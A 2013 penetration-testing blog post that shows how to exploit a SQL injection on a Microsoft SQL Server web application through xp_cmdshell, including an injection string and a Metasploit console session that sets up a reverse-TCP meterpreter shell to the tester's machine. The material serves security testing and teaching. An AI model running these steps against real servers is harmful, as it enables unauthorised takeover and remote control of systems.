Tuesday, 29 January 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-1)

In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:;exec master..xp_cmdshell ‘ping′;–
If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) >set GET_PATH
GET_PATH =>;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST

msf exploit(mssql_payload_sqli) >set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST

msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80

msf exploit(mssql_payload_sqli) > exploit
 After the exploitation the attacker will get a meterpreter shell. 
SQL injection exploitation with Metasploit
If you want to use this code you can download it from Secforce security tools repository.

No comments:

Post a Comment

Note: only a member of this blog may post a comment.